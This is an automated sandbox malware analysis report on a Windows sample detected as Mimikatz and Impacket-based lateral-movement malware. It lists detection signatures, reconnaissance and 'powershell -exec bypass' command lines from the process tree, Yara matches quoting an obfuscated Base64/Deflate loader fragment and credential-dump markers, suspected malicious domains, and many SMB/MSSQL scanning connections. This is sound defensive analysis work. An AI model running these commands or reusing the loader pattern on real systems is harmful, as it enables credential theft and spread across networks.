Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Analysis Report UlJpFEz1Cj

Overview

General Information

Sample Name:UlJpFEz1Cj (renamed file extension from none to exe)
Analysis ID:381876
MD5:dde978f310f46d0556ea774da695b698
SHA1:e22548f91b17d4f4fc38dfe1b90ea71b1a2bfed1
SHA256:0bc20b98a473491219885cc68d0f0944563260ae12add1b1199e64255e92c40d
Tags:ShenzhenSmartspaceSoftwaretechnologyCoLimited
Infos:

Most interesting Screenshot:

Detection

Mimikatz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Hacktool Mimikatz
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Found suspicious powershell code related to unpacking or dynamic code loading
Gathers network related connection and port information
Machine Learning detection for sample
Uses ipconfig to lookup or modify the Windows network settings
Uses netstat to query active network connections and open ports
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Reconnaissance Activity
Uses 32bit PE files
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Startup

  • System is w10x64
  • UlJpFEz1Cj.exe (PID: 6528 cmdline: 'C:\Users\user\Desktop\UlJpFEz1Cj.exe' MD5: DDE978F310F46D0556EA774DA695B698)
    • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • UlJpFEz1Cj.exe (PID: 6640 cmdline: 'C:\Users\user\Desktop\UlJpFEz1Cj.exe' MD5: DDE978F310F46D0556EA774DA695B698)
      • cmd.exe (PID: 6684 cmdline: cmd /c wmic ntdomain get domainname MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • WMIC.exe (PID: 6696 cmdline: wmic ntdomain get domainname MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • cmd.exe (PID: 6752 cmdline: cmd /c net localgroup administrators MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • net.exe (PID: 6764 cmdline: net localgroup administrators MD5: DD0561156F62BC1958CE0E370B23711B)
          • net1.exe (PID: 6788 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: B5A26C2BF17222E86B91D26F1247AF3E)
      • cmd.exe (PID: 6804 cmdline: cmd /c net group 'domain admins' /domain MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • net.exe (PID: 6816 cmdline: net group 'domain admins' /domain MD5: DD0561156F62BC1958CE0E370B23711B)
          • net1.exe (PID: 6832 cmdline: C:\Windows\system32\net1 group 'domain admins' /domain MD5: B5A26C2BF17222E86B91D26F1247AF3E)
      • powershell.exe (PID: 6964 cmdline: C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • ipconfig.exe (PID: 4944 cmdline: ipconfig /all MD5: B0C7423D02A007461C850CD0DFE09318)
      • ipconfig.exe (PID: 6448 cmdline: ipconfig /all MD5: B0C7423D02A007461C850CD0DFE09318)
      • NETSTAT.EXE (PID: 4424 cmdline: netstat -na MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
UlJpFEz1Cj.exeImpacket_KeywordDetects Impacket Keyword in ExecutableFlorian Roth
  • 0x6a1d1c:$s1: impacket.smb(
  • 0x6a1ced:$s2: impacket.ntlm(
  • 0x6a1c8b:$s3: impacket.nmb(
UlJpFEz1Cj.exeImpacket_Tools_psexecCompiled Impacket ToolsFlorian Roth
  • 0x6a1a63:$s1: impacket.examples.serviceinstall(
  • 0x6a1a26:$s3: impacket.examples.remcomsvc(
UlJpFEz1Cj.exeImpacket_Lateral_MovementDetects Impacket Network Aktivity for Lateral MovementMarkus Neis
  • 0x6a197b:$s1: impacket.dcerpc.v5.transport(
  • 0x6a1daf:$s2: impacket.smbconnection(
  • 0x6a1825:$s3: impacket.dcerpc.v5.ndr(
  • 0x6a1de7:$s4: impacket.spnego(
  • 0x6a1d1c:$s5: impacket.smb(
  • 0x6a1ced:$s6: impacket.ntlm(
  • 0x6a1c8b:$s7: impacket.nmb(

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txtMimikatz_LogfileDetects a log file generated by malicious hack tool mimikatzFlorian Roth
  • 0x5b6:$s1: SID :
  • 0x858:$s1: SID :
  • 0xa13:$s1: SID :
  • 0xb9d:$s1: SID :
  • 0xd72:$s1: SID :
  • 0xeff:$s1: SID :
  • 0x1089:$s1: SID :
  • 0x11c3:$s1: SID :
  • 0x64c:$s2: * NTLM :
  • 0x4d1:$s3: Authentication Id :
  • 0x77e:$s3: Authentication Id :
  • 0x939:$s3: Authentication Id :
  • 0xac3:$s3: Authentication Id :
  • 0xc95:$s3: Authentication Id :
  • 0xe22:$s3: Authentication Id :
  • 0xfaf:$s3: Authentication Id :
  • 0x10de:$s3: Authentication Id :
  • 0x6bd:$s4: wdigest :
  • 0x888:$s4: wdigest :
  • 0xa47:$s4: wdigest :
  • 0xbcd:$s4: wdigest :
C:\Users\user\Desktop\mkatz.iniMimikatz_LogfileDetects a log file generated by malicious hack tool mimikatzFlorian Roth
  • 0x2ae:$s1: SID :
  • 0x569:$s1: SID :
  • 0x738:$s1: SID :
  • 0x8d3:$s1: SID :
  • 0xabc:$s1: SID :
  • 0xc5a:$s1: SID :
  • 0xdf5:$s1: SID :
  • 0xf3d:$s1: SID :
  • 0x349:$s2: * NTLM :
  • 0x1c3:$s3: Authentication Id :
  • 0x489:$s3: Authentication Id :
  • 0x658:$s3: Authentication Id :
  • 0x7f3:$s3: Authentication Id :
  • 0x9d9:$s3: Authentication Id :
  • 0xb77:$s3: Authentication Id :
  • 0xd15:$s3: Authentication Id :
  • 0xe52:$s3: Authentication Id :
  • 0x3bd:$s4: wdigest :
  • 0x59c:$s4: wdigest :
  • 0x76f:$s4: wdigest :
  • 0x906:$s4: wdigest :
C:\Users\user\Desktop\m2.ps1apt_c16_win_wateringholeDetects code from APT wateringhole@dragonthreatlab
  • 0x0:$str2: Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.203224359.0000000004464000.00000004.00000001.sdmpSUSP_Netsh_PortProxy_CommandDetects a suspicious command line with netsh and the portproxy commandFlorian Roth
  • 0x99a8:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x9ac4:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x9be7:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x9d05:$x1: netsh interface portproxy add v4tov4 listenport=
00000003.00000003.203074202.000000000435C000.00000004.00000001.sdmpSUSP_Netsh_PortProxy_CommandDetects a suspicious command line with netsh and the portproxy commandFlorian Roth
  • 0x15cf6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x15e16:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x15f36:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3f386:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3f44c:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3f512:$x1: netsh interface portproxy add v4tov4 listenport=
00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmpSUSP_Netsh_PortProxy_CommandDetects a suspicious command line with netsh and the portproxy commandFlorian Roth
  • 0x314:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3da:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x4a0:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x319f:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x57cc:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x5892:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x5958:$x1: netsh interface portproxy add v4tov4 listenport=
00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmpSUSP_Netsh_PortProxy_CommandDetects a suspicious command line with netsh and the portproxy commandFlorian Roth
  • 0x3a096:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a1b6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a2d6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a3f6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a516:$x1: netsh interface portproxy add v4tov4 listenport=
Process Memory Space: UlJpFEz1Cj.exe PID: 6640SUSP_Netsh_PortProxy_CommandDetects a suspicious command line with netsh and the portproxy commandFlorian Roth
  • 0x9ac:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xab4:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xbbf:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xcc8:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xdd1:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3047:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x316b:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3292:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x33b6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x34da:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x35f1:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x6e4d:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x6f13:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x6fd9:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x72fd:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x73c3:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x7489:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xc8c7:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xc98d:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xca53:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xd4b8:$x1: netsh interface portproxy add v4tov4 listenport=
Click to see the 1 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Reconnaissance Activity
Source: Process startedAuthor: Florian Roth, omkar72: Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: cmd /c net localgroup administrators, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6752, ProcessCommandLine: net localgroup administrators, ProcessId: 6764
Sigma detected: Net.exe Execution
Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: cmd /c net localgroup administrators, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6752, ProcessCommandLine: net localgroup administrators, ProcessId: 6764

Signature Overview

  • AV Detection
  • Exploits
  • Privilege Escalation
  • Compliance
  • Spreading
  • Networking
  • System Summary
  • Data Obfuscation
  • Persistence and Installation Behavior
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Anti Debugging
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection
  • Stealing of Sensitive Information

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: UlJpFEz1Cj.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Users\user\Desktop\m2.ps1Avira: detection malicious, Label: TR/Drop.PShell.B
Multi AV Scanner detection for domain / URL
Source: info.ackng.comVirustotal: Detection: 10%Perma Link
Source: beahh.comVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted file
Source: UlJpFEz1Cj.exeVirustotal: Detection: 60%Perma Link
Source: UlJpFEz1Cj.exeReversingLabs: Detection: 82%
Machine Learning detection for sample
Source: UlJpFEz1Cj.exeJoe Sandbox ML: detected
Source: 3.1.UlJpFEz1Cj.exe.1120000.15.unpackAvira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1120000.16.unpackAvira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1150000.19.unpackAvira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1160000.22.unpackAvira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1160000.21.unpackAvira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1150000.20.unpackAvira: Label: TR/Crypt.XPACK.Gen7

Exploits:

barindex
Connects to many different private IPs (likely to spread or exploit)
Source: global trafficTCP traffic: 192.168.1.217:1433
Source: global trafficTCP traffic: 192.168.1.218:1433
Source: global trafficTCP traffic: 192.168.1.219:1433
Source: global trafficTCP traffic: 192.168.1.213:1433
Source: global trafficTCP traffic: 192.168.1.214:1433
Source: global trafficTCP traffic: 192.168.1.215:1433
Source: global trafficTCP traffic: 192.168.1.216:1433
Source: global trafficTCP traffic: 192.168.1.210:1433
Source: global trafficTCP traffic: 192.168.1.211:1433
Source: global trafficTCP traffic: 192.168.1.212:1433
Source: global trafficTCP traffic: 192.168.1.206:1433
Source: global trafficTCP traffic: 192.168.1.207:1433
Source: global trafficTCP traffic: 192.168.1.208:1433
Source: global trafficTCP traffic: 192.168.1.209:1433
Source: global trafficTCP traffic: 192.168.1.202:1433
Source: global trafficTCP traffic: 192.168.1.203:1433
Source: global trafficTCP traffic: 192.168.1.204:1433
Source: global trafficTCP traffic: 192.168.1.205:1433
Source: global trafficTCP traffic: 192.168.1.200:1433
Source: global trafficTCP traffic: 192.168.1.201:1433
Source: global trafficTCP traffic: 192.168.1.118:1433
Source: global trafficTCP traffic: 192.168.1.239:445
Source: global trafficTCP traffic: 192.168.1.119:1433
Source: global trafficTCP traffic: 192.168.1.114:1433
Source: global trafficTCP traffic: 192.168.1.235:445
Source: global trafficTCP traffic: 192.168.1.115:1433
Source: global trafficTCP traffic: 192.168.1.236:445
Source: global trafficTCP traffic: 192.168.1.116:1433
Source: global trafficTCP traffic: 192.168.1.237:445
Source: global trafficTCP traffic: 192.168.1.117:1433
Source: global trafficTCP traffic: 192.168.1.238:445
Source: global trafficTCP traffic: 192.168.1.110:1433
Source: global trafficTCP traffic: 192.168.1.231:445
Source: global trafficTCP traffic: 192.168.1.111:1433
Source: global trafficTCP traffic: 192.168.1.232:445
Source: global trafficTCP traffic: 192.168.1.112:1433
Source: global trafficTCP traffic: 192.168.1.233:445
Source: global trafficTCP traffic: 192.168.1.113:1433
Source: global trafficTCP traffic: 192.168.1.234:445
Source: global trafficTCP traffic: 192.168.1.230:445
Source: global trafficTCP traffic: 192.168.1.107:1433
Source: global trafficTCP traffic: 192.168.1.228:445
Source: global trafficTCP traffic: 192.168.1.108:1433
Source: global trafficTCP traffic: 192.168.1.229:1433
Source: global trafficTCP traffic: 192.168.1.109:1433
Source: global trafficTCP traffic: 192.168.1.103:1433
Source: global trafficTCP traffic: 192.168.1.224:1433
Source: global trafficTCP traffic: 192.168.1.104:1433
Source: global trafficTCP traffic: 192.168.1.225:1433
Source: global trafficTCP traffic: 192.168.1.105:1433
Source: global trafficTCP traffic: 192.168.1.226:445
Source: global trafficTCP traffic: 192.168.1.106:1433
Source: global trafficTCP traffic: 192.168.1.227:445
Source: global trafficTCP traffic: 192.168.1.220:1433
Source: global trafficTCP traffic: 192.168.1.100:1433
Source: global trafficTCP traffic: 192.168.1.221:1433
Source: global trafficTCP traffic: 192.168.1.101:1433
Source: global trafficTCP traffic: 192.168.1.222:1433
Source: global trafficTCP traffic: 192.168.1.102:1433
Source: global trafficTCP traffic: 192.168.1.223:1433
Source: global trafficTCP traffic: 192.168.1.74:1433
Source: global trafficTCP traffic: 192.168.1.73:1433
Source: global trafficTCP traffic: 192.168.1.76:1433
Source: global trafficTCP traffic: 192.168.1.75:1433
Source: global trafficTCP traffic: 192.168.1.78:1433
Source: global trafficTCP traffic: 192.168.1.77:1433
Source: global trafficTCP traffic: 192.168.1.79:1433
Source: global trafficTCP traffic: 192.168.1.70:1433
Source: global trafficTCP traffic: 192.168.1.72:1433
Source: global trafficTCP traffic: 192.168.1.71:1433
Source: global trafficTCP traffic: 192.168.1.59:1433
Source: global trafficTCP traffic: 192.168.0.94:1433
Source: global trafficTCP traffic: 192.168.1.63:1433
Source: global trafficTCP traffic: 192.168.0.95:1433
Source: global trafficTCP traffic: 192.168.1.62:1433
Source: global trafficTCP traffic: 192.168.0.96:1433
Source: global trafficTCP traffic: 192.168.1.65:1433
Source: global trafficTCP traffic: 192.168.0.97:1433
Source: global trafficTCP traffic: 192.168.1.64:1433
Source: global trafficTCP traffic: 192.168.0.98:1433
Source: global trafficTCP traffic: 192.168.1.67:1433
Source: global trafficTCP traffic: 192.168.0.99:1433
Source: global trafficTCP traffic: 192.168.1.66:1433
Source: global trafficTCP traffic: 192.168.1.69:1433
Source: global trafficTCP traffic: 192.168.1.68:1433
Source: global trafficTCP traffic: 192.168.0.90:1433
Source: global trafficTCP traffic: 192.168.0.91:1433
Source: global trafficTCP traffic: 192.168.0.92:1433
Source: global trafficTCP traffic: 192.168.1.61:1433
Source: global trafficTCP traffic: 192.168.0.93:1433
Source: global trafficTCP traffic: 192.168.1.60:1433
Source: global trafficTCP traffic: 192.168.1.49:1433
Source: global trafficTCP traffic: 192.168.1.48:1433
Source: global trafficTCP traffic: 192.168.0.83:1433
Source: global trafficTCP traffic: 192.168.1.52:1433
Source: global trafficTCP traffic: 192.168.0.84:1433
Source: global trafficTCP traffic: 192.168.1.51:1433
Source: global trafficTCP traffic: 192.168.0.85:1433
Source: global trafficTCP traffic: 192.168.1.54:1433
Source: global trafficTCP traffic: 192.168.0.86:1433
Source: global trafficTCP traffic: 192.168.1.53:1433
Source: global trafficTCP traffic: 192.168.0.87:1433
Source: global trafficTCP traffic: 192.168.1.56:1433
Source: global trafficTCP traffic: 192.168.0.88:1433
Source: global trafficTCP traffic: 192.168.1.55:1433
Source: global trafficTCP traffic: 192.168.0.89:1433
Source: global trafficTCP traffic: 192.168.1.58:1433
Source: global trafficTCP traffic: 192.168.1.57:1433
Source: global trafficTCP traffic: 192.168.0.80:1433
Source: global trafficTCP traffic: 192.168.0.81:1433
Source: global trafficTCP traffic: 192.168.1.50:1433
Source: global trafficTCP traffic: 192.168.0.82:1433
Source: global trafficTCP traffic: 192.168.0.69:1433
Source: global trafficTCP traffic: 192.168.1.38:1433
Source: global trafficTCP traffic: 192.168.1.37:1433
Source: global trafficTCP traffic: 192.168.1.39:1433
Source: global trafficTCP traffic: 192.168.0.72:1433
Source: global trafficTCP traffic: 192.168.1.41:1433
Source: global trafficTCP traffic: 192.168.0.73:1433
Source: global trafficTCP traffic: 192.168.1.40:1433
Source: global trafficTCP traffic: 192.168.0.74:1433
Source: global trafficTCP traffic: 192.168.1.43:1433
Source: global trafficTCP traffic: 192.168.0.75:1433
Source: global trafficTCP traffic: 192.168.1.42:1433
Source: global trafficTCP traffic: 192.168.0.76:1433
Source: global trafficTCP traffic: 192.168.1.45:1433
Source: global trafficTCP traffic: 192.168.0.77:1433
Source: global trafficTCP traffic: 192.168.1.44:1433
Source: global trafficTCP traffic: 192.168.0.78:1433
Source: global trafficTCP traffic: 192.168.1.47:1433
Source: global trafficTCP traffic: 192.168.0.79:1433
Source: global trafficTCP traffic: 192.168.1.46:1433
Source: global trafficTCP traffic: 192.168.0.70:1433
Source: global trafficTCP traffic: 192.168.0.71:1433
Source: global trafficTCP traffic: 192.168.1.96:1433
Source: global trafficTCP traffic: 192.168.1.95:1433
Source: global trafficTCP traffic: 192.168.1.98:1433
Source: global trafficTCP traffic: 192.168.1.97:1433
Source: global trafficTCP traffic: 192.168.1.99:1433
Source: global trafficTCP traffic: 192.168.1.90:1433
Source: global trafficTCP traffic: 192.168.1.92:1433
Source: global trafficTCP traffic: 192.168.1.91:1433
Source: global trafficTCP traffic: 192.168.1.94:1433
Source: global trafficTCP traffic: 192.168.1.93:1433
Source: global trafficTCP traffic: 192.168.1.85:1433
Source: global trafficTCP traffic: 192.168.1.84:1433
Source: global trafficTCP traffic: 192.168.1.87:1433
Source: global trafficTCP traffic: 192.168.1.86:1433
Source: global trafficTCP traffic: 192.168.1.89:1433
Source: global trafficTCP traffic: 192.168.1.88:1433
Source: global trafficTCP traffic: 192.168.1.81:1433
Source: global trafficTCP traffic: 192.168.1.80:1433
Source: global trafficTCP traffic: 192.168.1.83:1433
Source: global trafficTCP traffic: 192.168.1.82:1433
Source: global trafficTCP traffic: 192.168.0.2:1433
Source: global trafficTCP traffic: 192.168.0.1:1433
Source: global trafficTCP traffic: 192.168.0.4:1433
Source: global trafficTCP traffic: 192.168.0.3:1433
Source: global trafficTCP traffic: 192.168.0.14:1433
Source: global trafficTCP traffic: 192.168.0.9:1433
Source: global trafficTCP traffic: 192.168.0.15:1433
Source: global trafficTCP traffic: 192.168.0.16:1433
Source: global trafficTCP traffic: 192.168.0.17:1433
Source: global trafficTCP traffic: 192.168.0.6:1433
Source: global trafficTCP traffic: 192.168.0.18:1433
Source: global trafficTCP traffic: 192.168.0.5:1433
Source: global trafficTCP traffic: 192.168.0.19:1433
Source: global trafficTCP traffic: 192.168.0.8:1433
Source: global trafficTCP traffic: 192.168.0.7:1433
Source: global trafficTCP traffic: 192.168.0.20:1433
Source: global trafficTCP traffic: 192.168.0.21:1433
Source: global trafficTCP traffic: 192.168.0.22:1433
Source: global trafficTCP traffic: 192.168.0.23:1433
Source: global trafficTCP traffic: 192.168.0.24:1433
Source: global trafficTCP traffic: 192.168.0.10:1433
Source: global trafficTCP traffic: 192.168.0.11:1433
Source: global trafficTCP traffic: 192.168.0.12:1433
Source: global trafficTCP traffic: 192.168.0.13:1433
Source: global trafficTCP traffic: 192.168.1.1:1433
Source: global trafficTCP traffic: 192.168.1.3:1433
Source: global trafficTCP traffic: 192.168.1.2:1433
Source: global trafficTCP traffic: 192.168.1.9:1433
Source: global trafficTCP traffic: 192.168.1.8:1433
Source: global trafficTCP traffic: 192.168.1.5:1433
Source: global trafficTCP traffic: 192.168.1.4:1433
Source: global trafficTCP traffic: 192.168.1.7:1433
Source: global trafficTCP traffic: 192.168.1.6:1433
Source: global trafficTCP traffic: 192.168.0.170:1433
Source: global trafficTCP traffic: 192.168.0.172:1433
Source: global trafficTCP traffic: 192.168.0.171:1433
Source: global trafficTCP traffic: 192.168.0.58:1433
Source: global trafficTCP traffic: 192.168.1.27:1433
Source: global trafficTCP traffic: 192.168.0.59:1433
Source: global trafficTCP traffic: 192.168.1.26:1433
Source: global trafficTCP traffic: 192.168.1.29:1433
Source: global trafficTCP traffic: 192.168.1.28:1433
Source: global trafficTCP traffic: 192.168.0.61:1433
Source: global trafficTCP traffic: 192.168.1.30:1433
Source: global trafficTCP traffic: 192.168.0.62:1433
Source: global trafficTCP traffic: 192.168.0.63:1433
Source: global trafficTCP traffic: 192.168.1.32:1433
Source: global trafficTCP traffic: 192.168.0.64:1433
Source: global trafficTCP traffic: 192.168.1.31:1433
Source: global trafficTCP traffic: 192.168.0.65:1433
Source: global trafficTCP traffic: 192.168.1.34:1433
Source: global trafficTCP traffic: 192.168.0.66:1433
Source: global trafficTCP traffic: 192.168.1.33:1433
Source: global trafficTCP traffic: 192.168.0.67:1433
Source: global trafficTCP traffic: 192.168.1.36:1433
Source: global trafficTCP traffic: 192.168.0.68:1433
Source: global trafficTCP traffic: 192.168.1.35:1433
Source: global trafficTCP traffic: 192.168.0.178:1433
Source: global trafficTCP traffic: 192.168.0.177:1433
Source: global trafficTCP traffic: 192.168.0.179:1433
Source: global trafficTCP traffic: 192.168.0.174:1433
Source: global trafficTCP traffic: 192.168.0.173:1433
Source: global trafficTCP traffic: 192.168.0.176:1433
Source: global trafficTCP traffic: 192.168.0.60:1433
Source: global trafficTCP traffic: 192.168.0.175:1433
Source: global trafficTCP traffic: 192.168.0.161:1433
Source: global trafficTCP traffic: 192.168.0.160:1433
Source: global trafficTCP traffic: 192.168.0.47:1433
Source: global trafficTCP traffic: 192.168.1.16:1433
Source: global trafficTCP traffic: 192.168.0.48:1433
Source: global trafficTCP traffic: 192.168.1.15:1433
Source: global trafficTCP traffic: 192.168.0.49:1433
Source: global trafficTCP traffic: 192.168.1.18:1433
Source: global trafficTCP traffic: 192.168.1.17:1433
Source: global trafficTCP traffic: 192.168.1.19:1433
Source: global trafficTCP traffic: 192.168.0.50:1433
Source: global trafficTCP traffic: 192.168.0.51:1433
Source: global trafficTCP traffic: 192.168.0.52:1433
Source: global trafficTCP traffic: 192.168.1.21:1433
Source: global trafficTCP traffic: 192.168.0.53:1433
Source: global trafficTCP traffic: 192.168.1.20:1433
Source: global trafficTCP traffic: 192.168.0.54:1433
Source: global trafficTCP traffic: 192.168.1.23:1433
Source: global trafficTCP traffic: 192.168.0.55:1433
Source: global trafficTCP traffic: 192.168.1.22:1433
Source: global trafficTCP traffic: 192.168.0.56:1433
Source: global trafficTCP traffic: 192.168.1.25:1433
Source: global trafficTCP traffic: 192.168.0.57:1433
Source: global trafficTCP traffic: 192.168.1.24:1433
Source: global trafficTCP traffic: 192.168.0.167:1433
Source: global trafficTCP traffic: 192.168.0.166:1433
Source: global trafficTCP traffic: 192.168.0.169:1433
Source: global trafficTCP traffic: 192.168.0.168:1433
Source: global trafficTCP traffic: 192.168.0.163:1433
Source: global trafficTCP traffic: 192.168.0.162:1433
Source: global trafficTCP traffic: 192.168.0.165:1433
Source: global trafficTCP traffic: 192.168.0.164:1433
Source: global trafficTCP traffic: 192.168.0.192:1433
Source: global trafficTCP traffic: 192.168.0.191:1433
Source: global trafficTCP traffic: 192.168.0.194:1433
Source: global trafficTCP traffic: 192.168.0.193:1433
Source: global trafficTCP traffic: 192.168.0.190:1433
Source: global trafficTCP traffic: 192.168.0.36:1433
Source: global trafficTCP traffic: 192.168.0.37:1433
Source: global trafficTCP traffic: 192.168.0.38:1433
Source: global trafficTCP traffic: 192.168.0.39:1433
Source: global trafficTCP traffic: 192.168.0.40:1433
Source: global trafficTCP traffic: 192.168.0.41:1433
Source: global trafficTCP traffic: 192.168.1.10:1433
Source: global trafficTCP traffic: 192.168.0.42:1433
Source: global trafficTCP traffic: 192.168.0.43:1433
Source: global trafficTCP traffic: 192.168.1.12:1433
Source: global trafficTCP traffic: 192.168.0.44:1433
Source: global trafficTCP traffic: 192.168.1.11:1433
Source: global trafficTCP traffic: 192.168.0.45:1433
Source: global trafficTCP traffic: 192.168.1.14:1433
Source: global trafficTCP traffic: 192.168.0.46:1433
Source: global trafficTCP traffic: 192.168.1.13:1433
Source: global trafficTCP traffic: 192.168.0.199:1433
Source: global trafficTCP traffic: 192.168.0.196:1433
Source: global trafficTCP traffic: 192.168.0.195:1433
Source: global trafficTCP traffic: 192.168.0.198:1433
Source: global trafficTCP traffic: 192.168.0.197:1433
Source: global trafficTCP traffic: 192.168.0.181:1433
Source: global trafficTCP traffic: 192.168.0.180:1433
Source: global trafficTCP traffic: 192.168.0.183:1433
Source: global trafficTCP traffic: 192.168.0.182:1433
Source: global trafficTCP traffic: 192.168.0.25:1433
Source: global trafficTCP traffic: 192.168.0.26:1433
Source: global trafficTCP traffic: 192.168.0.27:1433
Source: global trafficTCP traffic: 192.168.0.28:1433
Source: global trafficTCP traffic: 192.168.0.29:1433
Source: global trafficTCP traffic: 192.168.0.30:1433
Source: global trafficTCP traffic: 192.168.0.31:1433
Source: global trafficTCP traffic: 192.168.0.32:1433
Source: global trafficTCP traffic: 192.168.0.33:1433
Source: global trafficTCP traffic: 192.168.0.34:1433
Source: global trafficTCP traffic: 192.168.0.35:1433
Source: global trafficTCP traffic: 192.168.0.189:1433
Source: global trafficTCP traffic: 192.168.0.188:1433
Source: global trafficTCP traffic: 192.168.0.185:1433
Source: global trafficTCP traffic: 192.168.0.184:1433
Source: global trafficTCP traffic: 192.168.0.187:1433
Source: global trafficTCP traffic: 192.168.0.186:1433
Source: global trafficTCP traffic: 192.168.1.176:1433
Source: global trafficTCP traffic: 192.168.1.177:1433
Source: global trafficTCP traffic: 192.168.1.178:1433
Source: global trafficTCP traffic: 192.168.1.179:1433
Source: global trafficTCP traffic: 192.168.1.172:1433
Source: global trafficTCP traffic: 192.168.1.173:1433
